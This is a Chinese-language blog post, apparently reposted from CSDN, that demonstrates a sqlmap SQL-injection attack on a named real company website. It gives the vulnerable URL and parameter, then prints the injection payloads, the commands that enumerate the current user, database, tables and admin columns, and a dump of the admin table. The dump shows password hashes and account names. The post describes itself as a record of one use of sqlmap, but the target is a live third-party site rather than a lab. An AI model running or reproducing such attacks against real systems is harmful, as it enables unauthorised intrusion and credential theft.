url:
http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4
第一步:
-u 注入地址 --dbms "Mysql" --current-user
获取当前用户名
[root@Hacker~]# Sqlmap -u
http://www.microtek.com.cn/happystudy/happystudy_info
.php?idnow=4 --dbms "Mysql" --current-user
y/n 选择y后获得结果
sqlmap identified the following injection points with a total of 17
HTTP(s) requ
ests:
---
Place: GET
Parameter: idnow
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idnow=4 AND 8576=8576
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: idnow=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT
(0x3a71696d3a,0x586d
766645564446784b,0x3a68706b3a), NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: idnow=4 AND SLEEP(5)
---
web application technology: Apache 2.2.16, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
current user: 'zjmall@localhost'
第一步的结果:
得到用户名 zjmall
第二步:
获得当前数据库名
[root@Hacker~]# Sqlmap -u
http://www.microtek.com.cn/happystudy/happystudy_info
.php?idnow=4 --dbms "Mysql" --current-db
第二步得到的结果
current database: 'xbase'
这是数据库名
第三步:
-u 注入地址 --dbms "Mysql" --tables -D "xbase"
其中"xbase"是数据库名
获得当前数据库下的所有表名
[root@Hacker~]# Sqlmap -u
http://www.microtek.com.cn/happystudy/happystudy_info
.php?idnow=4 --dbms "Mysql" --tables -D "xbase"
第三步得到结果
+---------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| awards |
| banners |
| banners_history |
| block_p |
| card |
| categories |
| categories_description |
| cdb_announcements |
| cdb_attachments |
| cdb_banned |
| cdb_buddys |
| cdb_favorites |
| cdb_forumlinks |
| cdb_forums |
| cdb_karmalog |
| cdb_members |
| cdb_pm |
| cdb_poll |
| cdb_posts |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_stats |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_templates |
| cdb_threads |
| cdb_usergroups |
| cdb_words |
| channel_user |
| christmas |
| cms_ad |
| configuration |
| configuration_group |
| copyright |
| counter |
| counter_area |
| counter_browser |
| counter_daily |
| counter_day |
| counter_detail |
| counter_history |
| counter_month |
| counter_year |
| countries |
| currencies |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_info |
| data |
| detail |
| detail3 |
| detail_str |
| doa_info |
| doa_info_old |
| doa_products |
| doa_user |
| download |
| downloadccccc |
| driver_download |
| driver_faq |
| driver_faq_sort |
| driver_os |
| driver_os_old |
| driver_products |
| enter |
| faq |
| faq1 |
| fenleibiao |
| fujialm |
| geo_zones |
| hp_gb |
| hp_newscontent |
| hp_newstitle |
| imgupload |
| integral |
| languages |
| log_time |
| magazine |
| mail |
| manufacturers |
| manufacturers_info |
| mpcaward |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_total |
| other_download |
| other_download_old |
| pagecontent |
| pdbmb |
| phpbb_themes_name |
| probase |
| products |
| products_attributes |
| products_attributes_download |
| products_description |
| products_firstpage_show |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_to_categories |
| projector |
| question2 |
| question_classify |
| question_ok |
| question_user |
| question_wait |
| reviews |
| reviews_description |
| rma_info |
| salable |
| sanbaoka |
| sessions |
| software_xz |
| specials |
| study |
| study09 |
| study2014 |
| study_sort |
| sypdb |
| sytpb |
| tax_rates |
| tb_admin |
| tb_adurl |
| tb_code |
| tb_productbase |
| tb_productcapability |
| tb_search |
| tb_search_sort |
| tb_type |
| tb_type201503 |
| tb_user |
| tcpdlb3 |
| tcptpb |
| tfzcpb |
| tggxnb |
| tggxxb |
| thc |
| tips |
| title_pic |
| tjgxxb |
| tjxcb |
| total |
| total201505 |
| town |
| tv_show |
| txcxxb |
| txmtpb |
| txpfj |
| tygb |
| user2 |
| user_base |
| userinfo |
| wenjuan |
| whos_online |
| window |
| wxzd_products |
| wxzd_station |
| wxzd_station2014 |
| wxzk_sation2014_7 |
| zones |
| zones_to_geo_zones |
+---------------------------------------------+
敏感表名 -- admin
第四步:
-u 注入地址 --dbms "Mysql" --columns -T "admin" -D "xbase"
其中"admin"是表名
获得当前表下的所有字段
[root@Hacker~]# Sqlmap -u
http://www.microtek.com.cn/happystudy/happystudy_info
.php?idnow=4 --dbms "Mysql" --columns -T "admin" -D "xbase"
第四步得到结果
Database: xbase
Table: admin
[10 columns]
+---------------------+-------------+
| Column | Type |
+---------------------+-------------+
| admin_created | datetime |
| admin_email_address | varchar(96) |
| admin_firstname | varchar(32) |
| admin_groups_id | int(11) |
| admin_id | int(11) |
| admin_lastname | varchar(32) |
| admin_logdate | datetime |
| admin_lognum | int(11) |
| admin_modified | datetime |
| admin_password | varchar(40) |
+---------------------+-------------+
敏感字段
admin_password
admin_email_address
admin_firstname
第五步:
-u 注入地址 --dbms "Mysql" --dump -C
"admin_email_address,admin_firstname,admi
n_password" -T "admin" -D "xbase" -v 0
其中"admin_email_address,admin_firstname,admi
n_password"是表里的字段名
获取字段里的内容
[root@Hacker~]# Sqlmap -u
http://www.microtek.com.cn/happystudy/happystudy_info
.php?idnow=4 --dbms "Mysql" --dump -C
"admin_email_address,admin_firstname,admin
_lastname,admin_password" -T "admin" -D "xbase" -v 0
第五步得到结果
+-------------------------------------------------------------------+
| admin_password | admin_lastname | admin_firstname |
admin_email_address |
-------------------------+
| abb54e54d8506963266a299868b416f0:1a | Lee | Roy
| [email protected] |
| 4b53fdaeaa03382e1c6e190416807892:4d | Administrator | Store
| [email protected] |
| 73b1911cf444c08c46a549a6a10a690c | sdf | a
| [email protected] |
+-------------------------------------------------------------------+
看起来admin_lastname像是账号
或者是admin_email_address是账号(我也没有实验)
一次使用SQLMAP的过程
猜你喜欢
转载自blog.csdn.net/wxh0000mm/article/details/91972017
今日推荐
周排行